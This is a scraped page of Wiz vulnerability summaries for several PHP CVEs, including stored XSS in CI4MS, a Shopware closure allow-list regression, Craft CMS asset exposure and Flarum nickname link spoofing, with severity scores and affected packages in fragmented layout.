## 5.3
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Ha
Wiz
CVE-2026-34562 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-34562 [MEDIUM] CVE-2026-34562 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34562 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative configuration fields accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
Source : NVD
## 4.7
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (
Wiz
CVE-2026-23498 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-23498 [HIGH] CVE-2026-23498 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23498 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to an array and array crafted PHP Closure not checked being against allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1.
Source : NVD
## 7.2
Score
Published January 14, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
shopware/core
shopware/shopware
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 14, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2025-68436 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2025-68436 [MEDIUM] CVE-2025-68436 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68436 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, authenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Source : NVD
## 4.9
Score
Published January 5, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
Wiz
CVE-2026-30913 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2026-30913 [MEDIUM] CVE-2026-30913 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30913 :
PHP vulnerability analysis and mitigation
Flarum is open-source forum software. When the flarum/nicknames extension is enabled, a registered user can set their nickname to a string that email clients interpret as a hyperlink. The nickname is inserted verbatim into plain-text notification emails, and recipients may be misled into visiting attacker-controlled domains.
Source : NVD
## 4.6
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
flarum/nicknames
Sources
NVD
Composer Severity MEDIUM Has Fix Added at:
Wiz
CVE-2026-34569 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-34569 [CRITICAL] CVE-2026-34569 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34569 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog categories. An attacker can inject a malicious JavaScript payload into the category title field, which is then stored server-side. This stored payload is later rendered unsafely across public-facing blog category pages, administrative interfaces, and blog post views without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
CNA
2026-04-06
Published